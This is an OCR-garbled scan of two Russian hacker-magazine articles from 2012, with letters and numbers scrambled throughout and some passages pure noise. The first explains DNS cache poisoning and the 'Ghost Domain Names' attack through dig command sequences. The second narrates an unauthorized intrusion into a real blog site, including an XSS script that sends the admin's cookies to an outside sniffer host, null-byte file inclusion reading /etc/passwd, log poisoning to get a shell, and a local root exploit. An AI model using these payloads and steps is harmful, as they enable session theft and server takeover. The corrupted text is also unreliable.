
аНаскег .ехатріе. 3600 114 N5 п 5.1а г§е1і. ехатріе. 




крупной хостинг-компании. На схеме видно, что для начала мы 
спрашиваем у нашего І5Р адрес сайта ехатріе. сот. Так как на 


АсШІііопаІ Бесіііоп: 




сервере нетзаписи об этом домене, наш І5Р пойдет по цепочке 


П5.1іаг§е1:. ехатріе. ІИ А м.х.у .2 




и запоосит инфу у дел егиоова иного сеовеоа зоны .сот (пои этом 


При этом сервер-жертва сохранит в кеше А-запись (ІР-адрес) 
пзТагдеТ ехатріе, указанную в дополнительной секции, что позволит 
атакующему отвечать на последующие запросы для всего домена 
ІагдеО ехатріе. 

Второй вариант атаки (подмена 145-записи для другого домена 
жертвы) заключается в перенаправлении 0145-сервера другого 
домена, не относящегося к первоначальному запросу, на ІР-адрес, 
указанный атакующим: 

1. Запрос 0145-сервера: какова А-запись для БііЬсІотаіп.аиаскег. 
ехатріе? 

БиЬсІотаіп.аІіІіаскеп. ехатріе. ІІМ А 


заранее сообщая значение идентификатора и порта, на кото- 
рый нужно возвратить ответ). В то же время злоумышленники 
запускают ОйоЗ-атаку сервера с 1000 ботов, а другие 100 ботов 
используются для перебора ХЮ и Зоигсе Рогі. Если ты до сих пор 
не догадался, зачем злоумышленникам нужен 00о5 сервера, то 
я скажу тебе прямо: для торможения атакуемого сервера и для 
замедления хода пересылки и получения данных. Идем дальше. 
Если при проведении атаки каждый из ботов будет перебирать 25 
портов и 655 ХЮ-идентификаторов, то в итоге злоумышленники 
при помощи всего 100 (!) ботов получат скорость брута в 2500 ррз, 
хотя значение зоигсе-порта всегда заведомо меньше этого значе- 
ния (2 Л 11 = 2048). В среднем на перебор этих значений взломщи- 
кам потребуется от 6 до 11 секунд при скорости ботов всего 256 
Кбит/с. Таким образом, ответив на заданный вопрос угаданным 
портом, ХЮ и ІР-адресом ехатріе. сот, ботоводы смогут заразить 
доверенный (основной) сервер, при этом ответ делегированного 
сервера уже считается недействительным. Следствием этого 
становится цепная реакция, при которой автоматически окажутся 


2. Ответхакера: 
Апзыеп: 




зараженными обращающиеся клиентские 0145-серверы и клиен- 




ты. Кстати, обычно для разработки такого ботнета злоумышлен- 


Аиііііогіііу Бесіііоп: 




ники используют избитый банковский тооян 5оѵЕуе с помощью 


іаг§е1: .ехатріе. 3600 ІІМ N5 пБ.аІіІіаскег .ехатріе. 


дописывания к нему плагина перебора портов и прочего стаффа. 










АсШІііопаІ Бесіііоп: 




0-йАУ: 6Н05Т ООМАІИ ИАМЕ5 




пБ.аіІіаскег. ехатріе. ІІМ А ы.х.у.і 




В этой части статьи я оассмотою 0-баѵ-атакѵ типа 0145 СЬозІ 


На самом деле описанные выше атаки представлены в том 
упрощенном варианте, как они могли использоваться до 2000-х 
годов, так как порт при этом был статичным (53), а пересылаемый 


Оотаіп І4ате. Уязвимость, как оказалось, изначально была най- 
дена китайскими исследователями Цзянем Цзаном (Лап Лапд), 
Цзиньцзинем Лианом (Лщіп Ыапд), Каном Ли (Капд І_і), Цзю- 
нем Ли Рип І_і), Хайсинем Дуанем (Наіхіп Оиап) и Цзяньпхином 


ОСНОВНЫЕ ТИПЫ 0Ы5-ЗАПИСЕЙ 


• Запись А (или запись адреса) связывает имя хоста с адресом ІР 
(например, запрос А-записи на имя геіеггаіз.ісапп.огд вернетего ІР- 
адрес — 192.0.34.164); 

• запись АААА связывает имя хоста с адресом протокола ІРѵб 
(например, запрос АААА-записи на имя к.гооІ-зегѵегБ.пеІ вернет его 
ІРѵб-адрес — 2001 :7ТсІ::1 ); 

• запись С МАМЕ — каноническая запись имени (псевдоним) 
используется для перенаправления на другое имя; 


• запись МХ — почтовый обменник, указывает сервер(ы) обмена почтой 
для данного домена. 

• запись N5 указывает на 0145-сервер для данного домена; 

• запись 50А — начальная запись зоны, указывает, на каком сервере 
хранится эталонная информация о данном домене, содержит 
контактную информацию лица, ответственного за данную зону, 
тайминги (параметры времени) кеширования зонной информации 

и взаимодействия 0145-серверов. 



064 



ХАКЕР 05/160/2012 





Атаки на РЫВ: вчера, сегодня, завтра 



] 



.сот 




ТагдМей 





эыоп ІН ^ 


ПЕ ріИП, 


иѢШ ІН № Ів.С.іЛ 





іг&іііі^ѵ-сот ГіІ 




тъгдеіеа Ве^оіѵег 

рІЦ ьГ 1 . Ілд , си, ВЫВ ІЯ къ лМіРМіПі'ів.саі, 

гчіІ.рМгМлч.ічкл, иым ІЯ К5 1?<9**Л 

П1.])М141ІІ1|).{И, 4і»0 ІЯ N3 10*0,0.1 



Прототип атаки типа СНозІ Эотаіп Яатѳ (до и после] 



Ву Ріапріпд ѴѴи). Это реально понизило мое ЧСВ, когда я узнал, 
что являюсь не первым, кто ее обнаружил :). Но хватит о грустном, 
перейдем непосредственно катаке. 

Итак, целью на этот раз оказалось логическое обновление 
кеша в некоторых реализациях ОИВ-серверов. В основном зара- 
жение РЫВ-серверов используется для организации различного 
рода нехороших вещей: фишинга, ботнетов и распространения 
вредоносных программ. Очевидная стратегия их предотвращения 
— удалить вредоносные домены с верхнего уровня йЫВ, то есть 
системы, ответственной за какой-то конкретный домен. Экспе- 
рименты, проведенные группой перечисленных исследователей 
(а также это подтверждается и моими собственными исследова- 
ниями], показывают, что более 19 000 открытых РЫВ-серверов 
остаются уязвимыми к настоящему моменту. В их числе и серверы 
крупных компаний: Воодіе, МісгозоЙ, ІСАМЫ. Уязвимыми являются 
следующие реализации серверов: ОрепОЫВ, МВйЫВ, ВІЫй (все 
версии). Далее мы попробуем реализовать описываемую атаку 
с помощью стандартной ВІЫО'овской утилиты сіід. 

Итак, цель нашего сценария атаки — переписать кеш таким обра- 
зом, чтобы можно было постоянно расширять ТТІ_ домена в опреде- 
ленной ОЫВ-зоне. 

Теперь ближе к самой уязвимости. Она позволяет исполь- 
зовать созданные ранее вредоносные домены даже после их 
удаления делегированным сервером. Звучит как бред, но поверь 
мне, это правда. Давай попробуем во всем разобраться на те- 
стовых примерах (никогда не используй этот сценарий на живых 
машинах!). 

Первым делом получаем список корневых РЫВ-серверов: 

$ сіі§ 



;; ОЦЕБТтм 5ЕСТІ0ІМ: 
;ІЫ N5 



;; АМ5ЫЕК 5ЕСТІ0М: 

15333 ІМ N5 %. гооі: -Бегѵегз. пеі:. 
15333 ІМ N5 к.гоо1:-5егѵег5.пе1:. 
...целая куча других серверов... 



;; АРРІТт\ІАІ. 5ЕСТІ0ІМ: 

сі . гооТ - Бегѵе г б . пеТ . 48410 I N АААА 2001 : 500 : 26 : : сі 

т . гооі: - БегѵегБ . пеі: . 48410 ІМ АААА 2ѲѲ1:сІсЗ: :35 



Далее давай попробуем использовать какой-нибудь из этих корне 
вых ОИВ-серверов, к примеру, для моего сайта гООіѵѵОгт.сот : 

$ сіі^ (йт . гооі: -БегѵегБ . пеі: . г001зл/0гт.сот 



;; 01ІЕ5ТІ0М 5ЕСТІ0ІМ: 
;гѲѲ1зл/Ѳгт.сот. ІМ А 



;; АЦТНСЖІТУ 5ЕСТІ0М: 

сот. 172800 ІМ N5 к. ^1=1сІ- БегѵегБ. пе1=. 

сот. 172800 ІЫ N5 д . §1=1сІ- Бегѵегз . пеі: . 

...целая куча других серверов... 



;; АРРІТІОМАІ- 5ЕСТІ0ІМ: 

a. §Х16- Бегѵегз. пеТ. 172800 ІМ А 192.5.6.30 

b. ^ІсІ- БегѵегБ. пеі:. 172800 ІМ А 192.33.14.30 



В результате мы получаем список имен для домена .сот. 
Обрати внимание, что в конце значения «Йт.гооІ-БегѵегБ.пеІ.» 
обязательно нужно поставить точку. Этим мы указываем на пол- 
ное имя домена. Теперь постараемся получить список авторитет- 
ного сервера имен для гООіѵѵОгт.сот. Попробуем запросить эти 
серверы имен так, чтобы получить физический ІР-адрес сайта 
гООіѵѵОгт.сот : 

$ с!і§ @-р.§1:1сІ- Бегѵегз. пеТ. г001зл/0гт. сот 



;; 0ЦЕ5ТІ0М 5ЕСТІ0М: 
:гѲѲ1пл/Ѳгт.сот. ІМ А 



;; АЦТНСЖІТУ 5ЕСТІ0М: 

г001зл/0гт.сот. 172800 ІМ N5 П51.г001:м0гт.сот. 

г001зл/0гт.сот. 172800 ІМ N5 пб 2. г001зл/0гт. сот. 



АРРІТІОМАІ. 5ЕСТІ0М: 

ПБІ . гѲѲ’Ьл/Ѳгт . сот . 172800 ІМ А 31.222.185.106 

пб2 . г001зл/0гт . сот . 172800 ІМ А 31.222.185.106 



В разделе «АсИіІіопаІ Весііоп» мы видим ответ от N5, а также их 
физические адреса. Узнаем адрес гООіѵѵОгт.сот с помощью сервера 
пб2. гООіѵѵОгт.сот: 
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взлом 



ОМБѴепсІог 


Версия 


Уязвимые? 


вш 


9.8.0-Р4 


Да 


йІВ сІПБсасЬе 


1.05 


Да 


ІІпЬоипсІ 


1.4.11 


Нет 


1.4.7 


Да 


Роѵѵег^N5 


РесигзогЗ.З 


Да 


Мага^N5 


йеасІѵѵоосі-3.0.03 


Нет 


йеасІѵѵоосі-2.3.05 


Нет 


Місгозоіі ^N5 


ѴѴіпсІоѵѵз 5егѵег 2008 Р2 


Нет 


ѴѴіпсІоѵѵз 5егѵег 2008 Р2 


Да 



Уязвимые реализации ОЫБ-серверов 



$ сіі§ (Эп52.г001:м0гт.сот. гѲѲѢыѲпп. сот 



;; ОЦЕЗТтм 5ЕСТІОІМ: 
:гѲѲ1пл/Ѳгт.сот. ІМ А 



;; АЫ5ІЛІЕК 5ЕСТІОІМ: 

г00-Ы0гт.сот. 604800 ІИ А 31.222.185.106 



іі АІЛНОКІТУ 5Е СТІОІМ: 

г001:ы0гт.сот. 604800 ІМ N5 пзі. г001;ы0гт. сот. 

г001:м0гт.сот. 604800 ІМ N5 пб2. г001:м0гт. сот. 



;; АРРІТІОМАІ- БЕСТтМ: 

п б 1 . г 001:ы0 г т . сот . 604800 ІМ А 31.222.185.106 

пб2 . г001:м0гт . сот . 604800 ІЫ А 31.222.185.106 



Отлично, ІР-адрес 31.222.185.106. Теперь используем сіід для 
определения записей на серверах Гугла (8. 8. 8. 8): 

$ сіі§ г001:м0гт.сот А @8. 8. 8. 8 

; : рЦЕБТЮМ 5ЕСТІОМ: 

: гѲ0~ЫѲгт . сот . ІЫ А 



;; АМ5ЫЕК БЕСТтМ: 

г001:м0гт. сот. 86400 ІМ А 31.222.185.106 



Здесь 86400 — это ТТІ_, параметр, определяющий время жизни 
нашей записи на сервере 8. 8. 8. 8. Попробуем снова, чтобы убедиться 
в том, что наш ТТІ_ не вечен. По идее, его значение должно умень- 
шиться: 

гѲѲ1:м0пті. сот. 86356 ІМ А 31.222.185.106 

Действительно, теперь его результат равен 86 356 (на 4 секунды 
меньше). В случае если домен определяется как вредоносный, его 
удаление из глобального пространства доменных имен происходит 
в два этапа. Первый заключается в удалении его записи из ТЮ на 
серверах, а второй — в ожидании обнуления параметра ТТІ_ на всех 
ОИЗ-серверах, где содержится запись об этом домене. Настало время 
перейти вплотную к самой атаке. 

АТАКУЕМ! 

Для примера я создал сабдомен зесигііу на сайте Ьихого.иг . Про- 
верим запись о новосозданном сабдомене Бесигііѵ.Ьихого.иг : 

$ с!і% зесигіііу . Ьихого. иг @8. 8. 8. 8 




;; 0ЦЕ5ТІ0М 5ЕСТІОМ: 

•.зесигіііу. Ьихого. иг. ІМ А 



А№ЫЕК 5ЕСТДШ : 

зесигіііу. Ьихого. иг. 86400 ІМ А 91.212.89.7 



Так, зесигіІу.Ьихого.иг соответствует 91.212.89.7, и жить эта за- 
пись, по-видимому, будет 86 400 секунд, то есть ровно сутки. Далее 
удаляем наш сабдомен и снова проверяем значение сіід'ом: 

$ сіі§ зесигіііу. Ьихого. иг @8. 8. 8. 8 



;; ОЦЕБТтм 5ЕСТІОМ: 

•.зесигіііу. Ьихого. иг. ІМ А 



;; АМ5ЫЕК 5ЕСТІОМ: 

зесигіііу. Ьихого. иг. 86112 ІМ А 91.212.89.7 

Упс, приехали! Запись о нашем ресурсе осталась в Гугле даже 
после удаления сабдомена, сократился лишь ТТІ_. Если же мы про- 
верим содержимое кеша на собственном сервере, то по понятным 
причинам к нам ничего не возвратится: 

$ с!і§ зесигіііу. Ьихого. иг 



0ЦЕ5ТІ0М 5ЕСТІОМ: 

•.зесигіііѵ. Ьихого. иг. ІМ А 



; ; АІІТНОКІТУ 5ЕСТІОМ: 

Ьихого. иг. 1800 ІМ 50А пб. Ьихого. иг. іп-Ро. Ьихого. иг. 
2010092402 10800 3600 604800 10800 

В данном случае уязвимость присутствует в политике обнов- 
ления кеша конкретного сервера 0Ы5. Какуже говорилось выше, 
домен может быть полностью удален из глобального простран- 
ства доменных имен, но при этом оставаться «живым». Если нам 
каким-то образом удастся увеличить значение ТТІ_, то мы сможем 
сохранить жизнь и нашему ресурсу. 

Далее рассмотрим еще один пример: 

1. Регистрируем новый сабдомен, допустим, Іезіпз. Ьихого. иг. 

2 . В N51 прописываем «Іезіпз. Ьихого. иг», в N52 — «пз2. Ьихого. иг», 
в N53 — «П5І. Ьихого. иг». 

3. Мы можем подтвердить, что Іезіпз. Ьихого. иг был успешноуста- 
новлен в качестве имени сервера, отправив запрос на несуще- 
ствующий сабдомен, как показано ниже: 
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Атаки на БЫБ: вчера, сегодня, завтра 



$ сіі§ @Ь.§ 1 : 1 сІ- 5 егѵег.пе 1 :. 5 есигі 1 :у . Ьихого. иг 



;; 01ІЕ5ТІ0М 5ЕСТІ0ІМ: 
ізесигіііу. Ьихого. иг. ІМ А 



: : АІІТНОКІТѴ 


5ЕСТІОІМ: 








Ьихого. иг. 


604800 


ІІМ 


N5 


ПБІ . Ьихого . иг . 


Ьихого. иг. 


604800 


ІМ 


N5 


пб2. Ьихого. иг. . 


Ьихого. иг. 


604800 


ІМ 


N5 


’Еез'ЬпБ. Ьихого. иг. 



;; АРРЦТРЫМ 5ЕСТІ0М: 



ПБІ. Ьихого. иг. 


604800 


ІМ 


А 


91.212.89.7 


пб2 . Ьихого . иг^ 


604800 


ІМ 


А 


91.212.89.7 


пб2. Ьихого. иг. 


604800 


ІМ 


А 


91.212.89.7 


’Еез'ЬпБ. Ьихого. иг. 


604800 


ІМ 


А 


91.212.89.7 



4. Создаем ещеодин сабдомен под именем дЬозЕЬихого.иг. После 
этого берем конкретный, априори считающийся уязвимым сервер 
йЫБ и используем его для за проса сабдомена: 

$ с!і§ @ 4 . 2 . 2.4 %Ьоб 1 і. Ь ихого. иг 



;; ОЦЕБТИШ 5ЕСТІОМ: 

;^Ьоб1і. Ьихого. иг. ІЫ А 



; ; АІ\І 5 МЕК_5ЕСІ I О N : 

§ЬоБІ=. Ьихого. иг. 86112 ІМ А 91.212.89.7 

Теперь мы знаем, что в кеше РЫБ-сервера произошла делегация 
данных. Теперь снова можно смело удалить сабдомен. При этом 
делегация данных домена будет иметь постоянно уменьшаю- 
щийся ТТІ_. Так как мы знаем, что делегация имеет данные N5 
о записи домена и имени сервера, все это можно представить 
в следующем виде: 

§Ьо5І=. Ьихого. иг 86400 ІИ N5 1:ез1:п б . Ь ихого. и_г_ 

ТезТпз . Ьихого. иг 86400 ІИ А 91.212.89.7 

После того как домен был удален и истекло время жизни ТТІ_, на- 
блюдается вот такая картина: 



§Ьоб1:. Ьихого. иг 46400 ІМ N5 Те5І:п5. Ьихого. иг 
1:е5Тп5. Ьихого. иг 46400 ІМ А 91.212.89.7 

Следующим шагом будет изменение имени ЫЗ-сервера 
на что-то другое, например ІѲ5І2. Ьихого. иг. Используя тот же 
сервер йЫБ (4. 2. 2. 4), производим, как и прежде, уже описанный 
запрос на запись сервера имен. После этого содержимое нашего 
кеша перезаписывается и делегация данных уже должна выгля- 
деть следующим образом: 

§Ьоб1:. Ьихого. иг 86400 ІМ N5 Те5І:2. Ьихого. иг 
*е5*2. Ьихого. иг 86400 ІМ А 91.212.89.7 



Обрати внимание, что новые данные при делегации имеют новое 
значение ТТ1_. Если этот процесс повторяется несколько раз, можно 
держать значение ТТ1_ постоянным и всегда отличным от нуля. Чтобы 
успешно выполнить эту атаку в более широком диапазоне, можно 
производить запросы через уязвимые РЫБ-серверы до тех пор, 
пока выигранное время не будет достаточным. Здесьтакже нужно 
отметить один довольно интересный момент: если атака происходит 
на делегированные серверы и идет попытка резолва нашего не- 
хорошего ресурса через обычные (неделегированные) РЫБ-серверы 
средней/малой значимости, то эти серверы автоматически заража- 
ются вне зависимости оттого, уязвимы они или нет. 

ЗАКЛЮЧЕНИЕ 

После 2010 года постепенно ушли в небытие многие проблемы, 
связанные с эксплуатацией тривиальных уязвимостей в БИБ- 
серверах. А все благодаря средствам проверки целостности 
0Ы55ЕС, которые начали набирать обороты и внедряются уже по- 
всеместно. «Безопасный 0Ы5» ШЫББЕС) использует электронную 
цифровую подпись с построением цепочки доверия для опреде- 
ления целостности данных. 

Теоретически применение йЫББЕС может свести успешность 
атак отравления кеша к нулю. Однако из моей предыдущей статьи 
мы уже знаем, что ЭЦП «уже не торт» и существуют способы 
генерации ЭЦП и ключей с помощью коллизий криптографиче- 
ских функций, да и применяется «защищенный РЫБ» пока еще 
не везде, так как для нормального функционирования требуется 
тотальный переход всех звеньев БИБ-системы на новый уровень. 
Так что, пока есть время, дерзай! Не во вред, конечно, а для все- 
общего блага :). □С 



ИНТЕРЕСНЫЙ СЛУЧАЙ С ВШР 



В середине ноября 2011 года разработчики консорциума І5С, 
ведущего разработку самого популярного в интернете йМБ- 
сервера ВШй, опубликовали данные о наличии серьезной 
уязвимости в В I N 0 и призвали пользователей как можно 
скорее обновить используемую ими версию ПО. Согласно 
сообщению І5С, ряд «непонятных» сетевых событий могут 
привести ктому, что программное обеспечение ЕШО 9-й 
версии создает кеш-память с неверными доменными 
записями, а это может быть использовано для подделки 
доменных адресов. Кроме того, было установлено, что 
передача серверу определенных служебных данных 
приводит к краху работы программного обеспечения. Также 
в сообщении І5С говорится, что какими-либо служебными 
настройками исправить выявленные ошибки нельзя, так 
как проблема кроется именно в коде сервера и устраняется 
только через обновление. Подвержены уязвимости версии 
ВШй 9.8.1-Р1, 9.7.4-Р1, 9.6-ЕБѴ-Р5-Р1 и 9.4-Е5Ѵ-Р5-Р1. 



Основную тревогу вызывает именно неверная работа системы, 
которая при получении определенных клиентских запросов 
формирует область кеш-памяти, при последующих запросах 
к этой области происходит выдача неверных результатов 
с доменными записями. 

Технически у новых версий В I N 0 9 есть встроенные 
средства защиты, и в будущем кеш все равно был бы обновлен 
(если бы не обратная совместимость), но, учитывая важность 
верной работы йМБ-системы для современного интернета, этой 
проблеме разработчики присваивают критический уровень 
угрозы (СѴЕ-2011-4313). Кроме того, дополнительную опасность 
представляетто, что сами разработчики ВІЫй так и не смогли 
полностью описать все возможные сетевые события и запросы, 
которые приводят к сбою в работе кеша йМБ-сервера. После 
упомянутого в статье исследования Сети на уязвимость 6Ьобі 
Оотаіп Мате обнаружилось, что более 72% машин до сих пор 
используют уязвимые версии йМБ-серверов. Такие дела. 



шш 

• Общая матчасть по 
РЫ5; Ы1.1у/9уАгН2: 

• проверяем свой 
Р№ на вшивость: 

ЬіЫу/ѵѵРзТѴГ: 

• видео по РЫБсасІіе 
роізопіпд: 

ЬіЫу/бІРКЗІ: 

• презентация 
с описанием 
ЬаіІіѵѵіскесІ- 
сплоитов: 

ЬіІ.Іѵ/х8ЕіпиС: 

• познавательная 
статья об атаке Дэна 
Камински: 

ЬШу/ЗѵІдеУ: 

• китайская 
презентация на тему 
СНозІ Оотаіп Матез: 

Ьіиу/ѵѵОЦЦОІ . 
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СуЬег-Рипк (суЬег-рипкЙхакер.ги, ОхООООесІ.сот) 





Прощай, 

Лирушечка! 



ИСТОРИЯ ВЗЛОМА 
ПОПУЛЯРНОГО 
БЛОГОХОСТИНГА 
иѵЕіытЕКНЕТ.яи 



В ноябре прошлого года я обнаружил интересную 
уязвимость на одном из крупнейших порталов рунета — 
сайте Ііѵеіпіегпеі.ги . Она предоставляла возможности для 
заливки веб-шелла, доступа к БД с пользователями и 
даже получения привилегий рута на сервере! Об истории 
открытия и развития этого бага сейчас и пойдет речь. 
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Прощай, Лирушечка! 



КОРОТКО О ГЛАВНОМ 

Для начала нельзя не сказать пару слов о самом ресурсе 
Ыѵеіпіегпеі.ги (он же лиру или лирушечка). Многие используют его 
как сервис для сбора и анализа статистики посещений сайта, хотя 
это еще и огромная блогосеть со своим мылом (основано на Соодіе 
Аррз) и поисковой системой. Но, как известно, даже на крупных ре- 
сурсах вполне могут встретиться уязвимости вроде банальных Х55 
или 1_РІ. Собственно, решение о проверке знаменитой лирушечки 
на уязвимости пришло спонтанно. Мне стало интересно, защищен 
ли такой крупный проект от возможности взлома на достаточно 
простом уровне? Итак, для начала мы с приятелем начали руками 
тестировать данный ресурс на Х55. Спустя пару часов нашей ма- 
ленькой командой были найдены две пассивки и две активки. Одна 
активка находилась прямо в личных сообщениях (то есть стоило 
отправить письмо любому пользователю, как у него в браузере вы- 
полнился бы зловредный )б-код). Другая активка присутствовала в 
настройках пользователя (о ней речь пойдет немного ниже). 
Дальше мы составили простую схему захвата печенек админа сайта: 

1. Криптуем код снифера. 

2. Отправляем л ичное сообщение администратору (причем даже не 
обязательно, чтобы он ответил на наш месседж, достаточно про- 
сто открыть сообщение). 

3. Когда администратор заходит в «Новые сообщения», выполняет- 
ся нашзловред. 

4. РгоШ! 

Недолго думая, мы воплотили наш коварный план в жизнь 
(здесь я не буду описывать схему проведения Х55 и код снифера, 
так как эта тема уже неоднократно поднималась в журнале). Через 
день админ открыл наше личное сообщение, и мы получили завет- 
ные печеньки на мыло. Вот тут-то и началось самое интересное. 

АДМИНКА 

Вставив полученные печеньки в браузер и обновив страницу, 
я увидел то, ради чего стоило так стараться, — внизу каждой 
страницы выводилась многочисленная отладочная инфа. Посмо- 
треть на вывод 5СІІ_-запросов при просмотре личных сообщений ты 
можешь на соответствующем скриншоте. Дальше, после детально- 
го изучения полученной информации, я заинтересовался, можно ли 
протроянить админку через вторую активку, которая находилась в 
настройках пользователя в опции «Искать упоминания» и позволя- 
ла подключать )5-файлы с посторонних хостов? Содержание моего 
коварного сценария было простым: 



ІУ т Е&7ММ ІКН-ПІ НС 
СІГОЕ^СфВДСЛВДІ І^ИІІ 3. 

ГІІ-ЩіАШі^СІГСЕа ■ Р Н І Н I . 

Л ?іьѵл ияиі цсрвс-рЧ 

^ІІліІ'ЕИШ УЛ”-. 'ОаИ^ѵ-к'-.илі'і. 

ІЕ I 'ік-ГУж^^йК 'Іі I 

'к-іиксинс*. '«'і? 

іУ Вхгтргаіп жли д н.іііш х ПЦ ! і и ;л:і 1 1 
іж < л М_*КТ_.ШГ.Т 1 1 а ■ іпяхііиті ■ 5 : 

ЛР-Г,ітуг( , Гй"пСИт”ріЛ.Ѵ 1 1 - -[.г 

г^Гіг^Е , Гп[»ЛГг"іаМ. , 1 ’дчПѴ 

■ЭйГзій І ' Ш~ВПЭТ_тЕПІ И . ■ і „МѴЫ/ I . 

і і і. мхи!*.-' ілп иі_ 

к*, 'Ылн^г - * аиѵші , 'вга [в шяі'і ь 

Ел гг - рхъіі1х.Ео [ _ #1 12 л р 

Ба, гг - [и.ііі іпГг | Ел гт | р гІ і ггли-’ 1 1 : 

Г ’і Гу - ( , ІЕТТ:_'МгГВ" , ■ і'Ьсшх 1 іры. I іф. Ітіг і пхг тт>гт . гс/ 1 і - 

гів-тіьг ? ■ 14,1 Еі~ѵ_иал ■ , 1 1 зт,_і?аін . ■ ■] ■ 

I ■ ЕЧЙІ 1 _т 1 И ’ 1 ] - ^«.‘(■гчіМч^ТИ 1 

, «-=«им5 1 ■ р*эт_т іічс 1 1 1 і і : 



Конфиги БД 



<5сгір1:> 

сІоситеп1:.-Рогт5[0] .тупатез . ѵа1ие= 1 валез., Валентин Любимов., 

валезу. валеза. валезом'; 



іт§ = пеы Іта§е( ) ; 

іт^.згс = "Іііііір: //зпі-р-Рег . ги/5пі-р-Р.§і-Р?"+сІоситеп1:. соокіе: 
</5сгір1:> 



Строка со значениями «валез, Валентин Любимов, валезу, 
валеза, валезом» (Валентин Любимов ака ѴаІе2 — создатель и ру- 
ководитель ЫѵеіпІегпеСги, известный веб-предприниматель) была 
нужна для того, чтобы скрыть зловред и показать администратору 
оригинальное значение поля «Искать упоминания» в его профайле. 
Таким образом, даже если бы админ изменил пароль, то к нам на 
снифер все равно пришли бы его кукисы. 

НЕДОЛГИЙ ПУТЬ К ВЕБ-ШЕЛЛУ 

После успешного создания «закладки» в аккаунте администратора 
я продолжил изучать ресурс и набрел на раздел «Приложения». 
Возможно, изначально он задумывался как аналог приложений 



Ьа: Фіапгіорпі фі пг піАо&і ѵж лЛв: *Ып 

)рл:- щ )р. ХМ іЬш. гмІ'Ьгт іуйеа^.СКіѴтіі. Фтп Ьш іѴПС і5іик!и-,',п.Х..й 0 іЬійі^Ѵѵа іЬга. іЪіп іЕіикЗо-.Мі Іьэікл ' Оіьйк іЬп. з-ЪіпкідЬ 

«ийт# 1 Е ѵцг тааЗ $Ьт. міърл лгвдх&І Загат гс ги^ср-я: 1 0:1 4ія*ф' ѵцг іЫп воЬдк ореМтс 1 1 ■Фчрегйм*' гмг іюЮро 

2: ийг іаш»: іЬш вокфи ":?0:фйрЬег Ч* |йркг іЬт покірп Лрз: 14;^1ТР І'кг. ѵ йг Йр: і оокгра 

ав1кнІ;,з:ЙЙХвЬыЬ - . . ;Ьт всіоип грзп х я ' ) ~ ч ."аг ЬЪ ірш. гЬяі жіост Папшмк -Ъіп вок* сія еошЫе ттюгг 

от.и*г 4^- в«іирч , 51 , ?Т \ , яг пайрп ірск3132'^рсЪЬ^ 

Басіш: ѵж Ш? ѵрсЪіпй іѴт некрп ір ѵ . " I ~2 л>?крп 4Ьшл.^! ,* 3 5у*?яп Ъиз- іЬп ѵюк|шъ ііініл "4"4 №іе|?-^ла(«^ 

&&Н: ѵж стар Гу ззЬ<± іЬиісюЬсів ірли«гз:_9^?:ЯРС ІткЕ Іжш ЬЬ піѴ: ^ Ьоз. тѵсО с> =зз ь ізі 7 б п с*Ье> ^ б-" 2 !? Ч :4 2 У496 "29 лТІ 

ѴкГг ѵвг дГя іШ вдіор Іні]^№?аз:^5:б5 НАІ 44ео»а. Фа п^рп ѵж № ра;-і^ Ъа 1?мЬ 

ѵж отѵѵѵ: Фш покпи иГр:^ еЕс оір: іЬш кѵэс501:50Іі ІипігЬ' Ъкі Ьайі коа»п:5^і02: Іюпг]шааі«.ЬтШ 

Ьнх г Чі?:^0 Ьям Ьи Ьи ЬиЬ іаІІ^х4№^5 іаЬЬи Ммшіо^ ѵагІЬ ідЪЪя: іЬтвоЬ^рп ршіЬ:5()4:?04:1им риаі ЬіаЪшЕі 

йя*чл;5К-?05 -Ъопчс ІтпЪ^Ь ѵѵгіз югѵ«г. й'ѵ ѵтв ір-х-1 уоіИьѵ- йт поіоііп 

Ьімде Ьр4о с«1Ід.-49“-40б- гірт ^ Т-ИГ паше 4 іЬт ттЫ-ѵ'О "ЙіАѵвЬІ 

бшші : іЪкі пйоЁш Х&Х4Ѵ4Э Р*я* &йѵ*г X 1 1 Іі іЬйі вйкфа пмтіііз:49б:-а$?іѴЗйіт туйг 1Ь нййна: іЬт л-ѵкійаі 
(и^Ё%рщ4і)7іР~: Ьдм І^»т4»кп ЪілЬмІі С|Э&йі№Ілах*С5:50Ё:. ЪіпімііЬ 

%ижѵч:5 10:? 10:: Ьліцг Ш Ъі* ДМИ І Кциді 1 1 Г? 1 1 Ьиц? СОТОМІРѴ Іда ЪаЛ ?’ ? Г»Г "іж Иар: ЬНп Ш** 

Ъ^кцр^.5 1 2.5 1 2ч Ьсш? ЪкЬиЬ 1 ?:? 1 ■ ■ Ьме с^імсг Ш ЪйіЬ 

РаЕаі «тег СІозі ' еіг рдііТіі гюЕ Гсишсіт Ьола# о^«»«іаІ ,пррь іліеэі.ркр ога Беіг 14 



ЬРІ в аррз.Іі.ги 
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ѴѴ50 с правами рута на сервере Іі.ги 



Интересные таблицы в БД 



«ВКонтакте», «Одноклассников» и подобного, но в дальнейшем 
превратился в банальную систему для отправки подарков и 
остальных примочек, которые так нравятся девочкам. Но что самое 
интересное — приложения задействуют данные самого пользо- 
вателя, а также в них имеются многочисленные активки (но это, 
естественно, меня уже интересовало в меньшей степени). 

Итак, немного поизучав приложения и их взаимодействие с 
сервером, я нашел І_РІ на домене аррз. Іі.ги. Вывод ошибок был от- 
ключен, так что пришлось действовать вслепую. Сначала я подста- 
вил файл с расширением, но он не проинклудился, и тогда я решил 
воспользоваться нулл-байтом. Он-то мне и помог проинклудить 
всем известный /еіс/раззѵѵсі: 

арр5.1і.ги/іпсІех.рІір?5=. . /е1:с/ра55ысІ%Ѳ0 



6ІѴЕ МЕ МОРЕ! 

Итак, у нас уже есть шелл на сервере Іі.ги (что не могло не радо- 
вать), однако нужно было двигаться дальше. Как показал вывод 
команды 

ипате -а 



ядро — старое, и его вполне можно было порутать: 

І_іпих пѲб.гах.ги 2. 6. 21-1. 3228. -Рс7 #1 5МР Тие Зип 12 
14:56:37 ЕйТ 2007 х86_64. 



Что я, в принципе, и сделал, используя известный эксплойт 
ѵтзріісе: 



Уязвимость была довольно банальной, что меня удивило. Кто бы 
мог подумать, что на столь крупном портале могут существовать 
баги, которые даже новичками не должны допускаться. Но дальше 
— больше! После успеха с нулл-байтом я попробовал залиться 
через /ргос/зеК/епѵігоп и /ргос/зеК/стсІІіпе, однако все мои попыт- 
ки не увенчались успехом. Необходимо было найти действительно 
полезный файл, поэтому я и вспомнил о возможности реализации 
І_РІ через логи веб-сервера: 

арр5.1і.ги/іпсІех.рІір?5=. ./. ./. ./. ./. . /арасбе/Іо^Б/ 



56-3.2$ §сс 1. с -о 1 
56-3.2$ ./1 

б 6-3.2# ісі 

